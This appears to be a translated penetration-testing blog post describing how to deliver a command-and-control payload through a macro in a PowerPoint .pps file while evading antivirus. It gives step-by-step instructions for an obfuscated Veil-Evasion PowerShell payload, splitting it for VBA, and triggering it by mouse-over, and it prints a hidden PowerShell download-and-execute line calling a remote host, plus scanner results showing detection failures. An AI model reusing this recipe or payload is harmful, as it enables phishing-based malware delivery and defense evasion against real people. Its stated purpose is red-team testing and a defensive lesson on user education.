点击启用内容 - 绕过杀毒检测的C2通信技术

注意：本文所述技术可能已过时，但仍可作为学习现代工具技术演进的参考案例。

在BHIS，绕过杀毒扫描已成为我们的"办公室运动"。在进行C2测试时，我们会从内网主机建立到C2服务器的反向连接，通过多种数据传递方式来测试防御系统的检测能力。我们的成功率很高（通常能成功外传数据），主要原因是恶意流量的识别极其困难——攻击者可以通过混淆技术使流量逃过杀毒软件和安全设备的检测。

技术实现细节

1. 监听器配置
   在C2服务器设置443端口的反向TCP监听（选择443因其通常允许出站）。

2. 载荷生成
   使用Veil-Evasion工具生成混淆的PowerShell脚本载荷，该工具只需输入目标地址/端口及载荷类型即可自动生成代码。

3. 宏安全处理
   原始生成的2300字符单行脚本会触发VB编辑器报错。通过macro_safe.py脚本将长代码分割为VB可处理的片段：

   1 2 3 4 5

   # macro_safe.py处理示例 # 将长命令拆分为多行连接字符串 str = "powershell -nop -w hidden -c " & _ "IEX ((new-object net.webclient)." & _ "downloadstring('http://192.168.1.1/a'))"

4. PPT宏植入

   • 将文档另存为.pps（97-2003格式）避免"m"扩展名引起怀疑
   • 通过"开发工具"选项卡插入VB模块
   • 使用"鼠标点击"动作触发宏执行（覆盖整个首幻灯片的文本框）

安全绕过实证

测试扫描结果：

• Gmail扫描器 ❌ 未检测
• Windows Defender ❌ 未检测
• McAfee ❌ 未检测
• Symantec ❌ 未检测

唯一防护是PowerPoint的主动内容警告，但用户往往因"错误消息疲劳"而忽略。这种技术揭示了单纯依赖杀毒软件的黑名单机制和用户教育的重要性。

“如果必须让用户做安全决策，就必须持续教育他们认识潜在危险。” —— BHIS团队